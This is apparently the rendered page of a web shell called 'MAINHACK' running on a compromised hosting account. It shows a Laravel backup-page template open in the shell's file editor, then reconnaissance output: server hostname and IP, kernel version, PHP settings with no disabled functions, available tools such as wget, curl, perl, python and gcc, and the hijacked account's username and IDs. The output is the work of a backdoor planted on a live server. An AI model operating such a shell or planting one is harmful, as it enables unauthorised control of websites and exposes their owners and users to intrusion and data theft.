[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: index.blade.php
@extends('layouts.app') @section('title', __('lang_v1.backup')) @section('content') <!-- Content Header (Page header) --> <section class="content-header"> <h1 class="tw-text-xl md:tw-text-3xl tw-font-bold tw-text-black">@lang('lang_v1.backup') </h1> </section> <!-- Main content --> <section class="content"> @if (session('notification') || !empty($notification)) <div class="row"> <div class="col-sm-12"> <div class="alert alert-danger alert-dismissible"> <button type="button" class="close" data-dismiss="alert" aria-hidden="true">×</button> @if(!empty($notification['msg'])) {{$notification['msg']}} @elseif(session('notification.msg')) {{ session('notification.msg') }} @endif </div> </div> </div> @endif <div class="row"> <div class="col-sm-12"> @component('components.widget', ['class' => 'box-primary']) @slot('tool') <div class="box-tools"> <a class="tw-dw-btn tw-bg-gradient-to-r tw-from-indigo-600 tw-to-blue-500 tw-font-bold tw-text-white tw-border-none tw-rounded-full pull-right btn-modal-coupon" href="{{ url('backup/create') }}" id="create-new-backup-button" style="margin-bottom:2em;"> <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-tabler icons-tabler-outline icon-tabler-plus"> <path stroke="none" d="M0 0h24v24H0z" fill="none" /> <path d="M12 5l0 14" /> <path d="M5 12l14 0" /> </svg> @lang('messages.add') </a> </div> @endslot @if (count($backups)) <table class="table table-striped table-bordered"> <thead> <tr> <th>@lang('lang_v1.file')</th> <th>@lang('lang_v1.size')</th> <th>@lang('lang_v1.date')</th> <th>@lang('lang_v1.age')</th> <th>@lang('messages.actions')</th> </tr> </thead> <tbody> @foreach($backups as $backup) <tr> <td>{{ $backup['file_name'] }}</td> <td>{{ humanFilesize($backup['file_size']) }}</td> <td> {{ Carbon::createFromTimestamp($backup['last_modified'])->toDateTimeString() }} </td> <td> {{ Carbon::createFromTimestamp($backup['last_modified'])->diffForHumans(Carbon::now()) }} </td> <td> <a class="tw-dw-btn tw-dw-btn-xs tw-dw-btn-outline tw-dw-btn-accent" href="{{action([\App\Http\Controllers\BackUpController::class, 'download'], [$backup['file_name']])}}"><i class="fa fa-cloud-download"></i> @lang('lang_v1.download')</a> <a class="tw-dw-btn tw-dw-btn-outline tw-dw-btn-xs tw-dw-btn-error link_confirmation" data-button-type="delete" href="{{ route('delete_backup', $backup['file_name']) }}"><i class="fa fa-trash-o"></i> @lang('messages.delete') </a> </td> </tr> @endforeach </tbody> </table> @else <div class="well"> <h4>There are no backups</h4> </div> @endif <br> <strong>@lang('lang_v1.auto_backup_instruction'):</strong><br> <code>{{$cron_job_command}}</code> <br> @endcomponent </div> </div> </section> @endsection
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.86 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285